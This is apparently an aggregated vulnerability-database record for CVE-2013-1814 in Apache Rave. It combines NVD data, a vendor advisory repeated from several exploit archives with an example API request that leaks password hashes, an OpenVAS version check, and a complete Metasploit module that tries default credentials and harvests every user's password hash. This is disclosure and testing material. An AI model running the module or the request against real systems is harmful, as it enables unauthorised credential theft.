{"cve": [{"lastseen": "2021-02-02T06:06:50", "description": "The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.", "edition": 4, "cvss3": {}, "published": "2013-03-14T00:55:00", "title": "CVE-2013-1814", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1814"], "modified": "2013-07-03T17:03:00", "cpe": ["cpe:/a:apache:rave:0.16", "cpe:/a:apache:rave:0.15", "cpe:/a:apache:rave:0.14", "cpe:/a:apache:rave:0.11", "cpe:/a:apache:rave:0.12", "cpe:/a:apache:rave:0.18", "cpe:/a:apache:rave:0.20", "cpe:/a:apache:rave:0.17", "cpe:/a:apache:rave:0.19", "cpe:/a:apache:rave:0.13"], "id": "CVE-2013-1814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1814", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:rave:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.12:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": 
"software", "cvelist": ["CVE-2013-1814"], "description": "\r\n\r\nCVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave's user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=3DOFFSET\r\n\r\nwill return the following:\r\n\r\n{"error":false,"errorMessage":null,"errorCode":"NO_ERROR","result":{"result=\r\nSet":[{"entityId":1,"username":"canonical","email":"canonical@example.com",=\r\n"displayName":"Canonical\r\nUser","additionalName":"canonical","familyName":"User","givenName":"Canonic=\r\nal","honorificPrefix":null,"honorificSuffix":null,"preferredName":null,"abo=\r\nutMe":null,"status":"Single","addresses":[],"organizations":[],"properties"=\r\n:[{"entityId":1,"type":"thumbnailUrl","value":"http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg","qualifier":null,"extendedValue":n=\r\null,"primary":null,"id":"1"}],"password":"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.","expired":false,"locked":false,"enabled":true,=\r\n"openId":null,"forgotPasswordHash":null,"forgotPasswordTime":null,"defaultP=\r\nageLayout":{"entityId":4,"code":"columns_3","numberOfRegions":3,"renderSequ=\r\nence":3,"userSelectable":true},"confirmPassword":null,"defaultPageLayoutCod=\r\ne":null,"authorities":[{"entityId":2,"authority":"ROLE_ADMIN","users":[],"d=\r\nefaultForNewUser":false}],"id":"1","accountNonLocked":true,"creden
tialsNonE=\r\nxpired":true,"accountNonExpired":true},\r\n........ ],"pageSize":10,"offset":0,"totalResults":14,"numberOfPages":2,"cu=\r\nrrentPage":1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\r\n", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:DOC:29371", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29371", "title": "[CVE-2013-1814] Apache Rave exposes User over API", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-3242", "CVE-2013-2631", "CVE-2013-2267", "CVE-2013-2504", "CVE-2012-0790", "CVE-2013-0232", "CVE-2013-3239", "CVE-2013-0332", "CVE-2013-2594", "CVE-2013-1420", "CVE-2013-2945", "CVE-2013-2712", "CVE-2013-2750", "CVE-2013-1842", "CVE-2013-2714", "CVE-2013-3238", "CVE-2013-1904", "CVE-2013-2559", "CVE-2013-2582", "CVE-2013-1843", "CVE-2013-2713", "CVE-2013-2474", "CVE-2012-6096", "CVE-2013-1814"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:VULN:13053", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13053", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-04-23T19:05:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1814"], "description": "The host is running Apache Rave and is prone to an information\n disclosure vulnerability.", "modified": "2020-04-21T00:00:00", "published": "2013-03-14T00:00:00", "id": 
"OPENVAS:1361412562310803180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803180", "type": "openvas", "title": "Apache Rave User Information Disclosure Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Rave User Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:rave\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803180\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2013-1814\");\n script_bugtraq_id(58455);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-14 16:32:56 +0530 (Thu, 14 Mar 2013)\");\n script_name(\"Apache Rave User Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/82758\");\n script_xref(name:\"URL\", 
value:\"http://www.exploit-db.com/exploits/24744/\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/120769/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Mar/127\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/525982/30/0/threaded\");\n\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_rave_detect.nasl\");\n script_mandatory_keys(\"ApacheRave/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain sensitive\n information about all user accounts via the offset parameter.\");\n script_tag(name:\"affected\", value:\"Apache Rave versions 0.11 to 0.20\");\n script_tag(name:\"insight\", value:\"The flaw is due to error in handling of User RPC API, returns the full user\n object, including the salted and hashed password.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Rave 0.20.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is running Apache Rave and is prone to information\n disclosure vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://rave.apache.org/downloads.html\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!vers = get_app_version(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(vers =~ \"^0\\.\")\n{\n if(version_in_range(version:vers, test_version:\"0.11\", test_version2:\"0.20\")){\n report = report_fixed_ver(installed_version:vers, vulnerable_range:\"0.11 - 0.20\");\n security_message(port:port, data:report);\n }\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": 
[{"lastseen": "2016-12-05T22:21:08", "description": "", "published": "2013-03-12T00:00:00", "type": "packetstorm", "title": "Apache Rave User Exposure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-12T00:00:00", "id": "PACKETSTORM:120769", "href": "https://packetstormsecurity.com/files/120769/Apache-Rave-User-Exposure.html", "sourceData": "`CVE-2013-1814: Apache Rave exposes User over API \n \nSeverity: Important \n \nVendor: The Apache Software Foundation \n \nVersions Affected: \nRave 0.11 to 0.20 \n \nDescription: \nRave returns the full user object, including the salted and hashed \npassword, via the User RPC API. This endpoint is only available to \nauthenticated users, but will return all User objects in the database \ngiven the correct query. \n \nMitigation: \nAll users who rely on Rave's user management capabilities should \nupgrade to 0.20.1 or later. \nIf an upgrade is infeasible, restrict access to the /app/api/user URL \npaths via Spring Security configuration or other means. 
\n \nExample: \nA request to: \n \n/app/api/rpc/users/get?offset=3DOFFSET \n \nwill return the following: \n \n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result= \nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",= \n\"displayName\":\"Canonical \nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic= \nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo= \nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"= \n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/= \ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n= \null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P= \n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,= \n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP= \nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ= \nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod= \ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d= \nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE= \nxpired\":true,\"accountNonExpired\":true}, \n........ ],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu= \nrrentPage\":1}} \n \nCredit: \nThis issue was discovered by Andreas Guth of RWTH Aachen University. 
\n \nReferences: \nhttp://tomcat.apache.org/security.html \n \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120769/CVE-2013-1814.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Rave 0.11 0.20 - User Information Disclosure", "edition": 1, "published": "2013-03-13T00:00:00", "title": "Apache Rave 0.11 0.20 - User Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-13T00:00:00", "id": "EXPLOITPACK:2CE46B2666F25C13ECFE3632FA162641", "href": "", "sourceData": "CVE-2013-1814: Apache Rave exposes User over API\n\nSeverity: Important\n\nVendor: The Apache Software Foundation\n\nVersions Affected:\nRave 0.11 to 0.20\n\nDescription:\nRave returns the full user object, including the salted and hashed\npassword, via the User RPC API. This endpoint is only available to\nauthenticated users, but will return all User objects in the database\ngiven the correct query.\n\nMitigation:\nAll users who rely on Rave's user management capabilities should\nupgrade to 0.20.1 or later.\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\npaths via Spring Security configuration or other means.\n\nExample:\nA request to:\n\n/app/api/rpc/users/get?offset=OFFSET\n\nwill return the 
following:\n\n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result=\nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",=\n\"displayName\":\"Canonical\nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic=\nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo=\nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"=\n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/=\ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n=\null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,=\n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP=\nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ=\nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod=\ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d=\nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE=\nxpired\":true,\"accountNonExpired\":true},\n........ 
],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu=\nrrentPage\":1}}\n\nCredit:\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\n\nReferences:\nhttp://tomcat.apache.org/security.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T14:57:06", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Rave 0.11 - 0.20 - User Information Disclosure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78436", "id": "SSV:78436", "sourceData": "\n CVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave's user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=OFFSET\r\n\r\nwill return the 
following:\r\n\r\n{"error":false,"errorMessage":null,"errorCode":"NO_ERROR","result":{"result=\r\nSet":[{"entityId":1,"username":"canonical","email":"canonical@example.com",=\r\n"displayName":"Canonical\r\nUser","additionalName":"canonical","familyName":"User","givenName":"Canonic=\r\nal","honorificPrefix":null,"honorificSuffix":null,"preferredName":null,"abo=\r\nutMe":null,"status":"Single","addresses":[],"organizations":[],"properties"=\r\n:[{"entityId":1,"type":"thumbnailUrl","value":"http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg","qualifier":null,"extendedValue":n=\r\null,"primary":null,"id":"1"}],"password":"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.","expired":false,"locked":false,"enabled":true,=\r\n"openId":null,"forgotPasswordHash":null,"forgotPasswordTime":null,"defaultP=\r\nageLayout":{"entityId":4,"code":"columns_3","numberOfRegions":3,"renderSequ=\r\nence":3,"userSelectable":true},"confirmPassword":null,"defaultPageLayoutCod=\r\ne":null,"authorities":[{"entityId":2,"authority":"ROLE_ADMIN","users":[],"d=\r\nefaultForNewUser":false}],"id":"1","accountNonLocked":true,"credentialsNonE=\r\nxpired":true,"accountNonExpired":true},\r\n........ ],"pageSize":10,"offset":0,"totalResults":14,"numberOfPages":2,"cu=\r\nrrentPage":1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\n ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78436"}], "exploitdb": [{"lastseen": "2016-02-02T23:55:56", "description": "Apache Rave 0.11 - 0.20 - User Information Disclosure. CVE-2013-1814. 
Webapps exploit for multiple platforms", "published": "2013-03-13T00:00:00", "type": "exploitdb", "title": "Apache Rave 0.11 - 0.20 - User Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-13T00:00:00", "id": "EDB-ID:24744", "href": "https://www.exploit-db.com/exploits/24744/", "sourceData": "CVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave's user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=OFFSET\r\n\r\nwill return the 
following:\r\n\r\n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result=\r\nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",=\r\n\"displayName\":\"Canonical\r\nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic=\r\nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo=\r\nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"=\r\n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n=\r\null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,=\r\n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP=\r\nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ=\r\nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod=\r\ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d=\r\nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE=\r\nxpired\":true,\"accountNonExpired\":true},\r\n........ ],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu=\r\nrrentPage\":1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/24744/"}], "metasploit": [{"lastseen": "2019-12-09T15:11:32", "description": "This module exploits an information disclosure in Apache Rave 0.20 and prior. 
The vulnerability exists in the RPC API, which allows any authenticated user to disclose information about all the users, including their password hashes. In order to authenticate, the user can provide his own credentials. Also the default users installed with Apache Rave 0.20 will be tried automatically. This module has been successfully tested on Apache Rave 0.20.\n", "published": "2013-07-09T19:03:35", "type": "metasploit", "title": "Apache Rave User Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2018-08-21T13:50:26", "id": "MSF:AUXILIARY/GATHER/APACHE_RAVE_CREDS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Rave User Information Disclosure',\n 'Description' => %q{\n This module exploits an information disclosure in Apache Rave 0.20 and prior. The\n vulnerability exists in the RPC API, which allows any authenticated user to\n disclose information about all the users, including their password hashes. In order\n to authenticate, the user can provide his own credentials. Also the default users\n installed with Apache Rave 0.20 will be tried automatically. 
This module has been\n successfully tested on Apache Rave 0.20.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Andreas Guth', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1814' ],\n [ 'OSVDB', '91235' ],\n [ 'BID', '58455' ],\n [ 'EDB', '24744']\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),\n OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),\n OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def login(username, password)\n uri = normalize_uri(target_uri.to_s, \"j_spring_security_check\")\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'POST',\n 'vars_post' => {\n 'j_password' => username,\n 'j_username' => password\n }\n })\n\n if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/\n return $1\n else\n return nil\n end\n end\n\n def disclose(cookie, offset)\n uri = normalize_uri(target_uri.to_s, \"app\", \"api\", \"rpc\", \"users\", \"get\")\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n 'vars_get' => {\n 'offset' => \"#{offset}\"\n },\n 'cookie' => \"JSESSIONID=#{cookie}\"\n })\n\n if res and res.code == 200 and res.headers['Content-Type'] =~ /application\\/json/ and res.body =~ /resultSet/\n return res.body\n else\n return nil\n end\n\n end\n\n def setup\n # Default accounts installed and enabled on Apache Rave 0.20\n @default_accounts = {\n \"canonical\" => \"canonical\",\n \"john.doe\" => \"john.doe\",\n \"jane.doe\" => \"jane.doe\",\n \"johnldap\" => \"johnldap\",\n \"four.col\" => \"four.col\",\n \"fourwn.col\" => \"fourwn.col\",\n \"george.doe\" => \"george.doe\",\n \"maija.m\" => \"maija.m\",\n \"mario.rossi\" => \"mario.rossi\",\n \"one.col\" => \"one.col\",\n \"three.col\" => \"three.col\",\n 
\"threewn.col\" => \"threewn.col\",\n \"twown.col\" => \"twown.col\"\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n def run\n\n print_status(\"#{rhost}:#{rport} - Fingerprinting...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.to_s, \"login\"),\n 'method' => 'GET',\n })\n\n if not res\n print_error(\"#{rhost}:#{rport} - No response, aborting...\")\n return\n elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\\.]*)<\\/span>/\n version =$1\n if version <= \"0.20\"\n print_good(\"#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...\")\n else\n print_error(\"#{rhost}:#{rport} - Apache Rave #{version} found. Not vulnerable. Aborting...\")\n return\n end\n else\n print_warning(\"#{rhost}:#{rport} - Apache Rave Portal not found, trying to log-in anyway...\")\n end\n\n cookie = nil\n unless datastore[\"USERNAME\"].empty? or datastore[\"PASSWORD\"].empty?\n print_status(\"#{rhost}:#{rport} - Login with the provided credentials...\")\n cookie = login(datastore[\"USERNAME\"], datastore[\"PASSWORD\"])\n if cookie.nil?\n print_error(\"#{rhost}:#{rport} - Login failed\")\n else\n print_good(\"#{rhost}:#{rport} - Login Successful. 
Proceeding...\")\n end\n end\n\n if cookie.nil?\n print_status(\"#{rhost}:#{rport} - Login with default accounts...\")\n @default_accounts.each { |user, password|\n print_status(\"#{rhost}:#{rport} - Login with the #{user} default account...\")\n cookie = login(user, password)\n unless cookie.nil?\n print_good(\"#{rhost}:#{rport} - Login Successful. Proceeding...\")\n break\n end\n }\n end\n\n if cookie.nil?\n print_error(\"#{rhost}:#{rport} - Login failed. Aborting...\")\n return\n end\n\n print_status(\"#{rhost}:#{rport} - Disclosing information...\")\n offset = 0\n search = true\n\n while search\n print_status(\"#{rhost}:#{rport} - Disclosing offset #{offset}...\")\n users_data = disclose(cookie, offset)\n if users_data.nil?\n print_error(\"#{rhost}:#{rport} - Disclosure failed. Aborting...\")\n return\n else\n print_good(\"#{rhost}:#{rport} - Disclosure successful\")\n end\n\n json_info = JSON.parse(users_data)\n\n path = store_loot(\n 'apache.rave.users',\n 'application/json',\n rhost,\n users_data,\n nil,\n \"Apache Rave Users Database Offset #{offset}\"\n )\n print_status(\"#{rhost}:#{rport} - Information for offset #{offset} saved in: #{path}\")\n\n print_status(\"#{rhost}:#{rport} - Recovering Hashes...\")\n json_info[\"result\"][\"resultSet\"].each { |result|\n print_good(\"#{rhost}:#{rport} - Found cred: #{result[\"username\"]}:#{result[\"password\"]}\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: 'Apache Rave',\n user: result[\"username\"],\n password: result[\"password\"],\n proof: user_data\n )\n }\n\n page = json_info[\"result\"][\"currentPage\"]\n total_pages = json_info[\"result\"][\"numberOfPages\"]\n offset = offset + json_info[\"result\"][\"pageSize\"]\n if page == total_pages\n search = false\n end\n\n end\n\n end\nend\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/apache_rave_creds.rb"}]}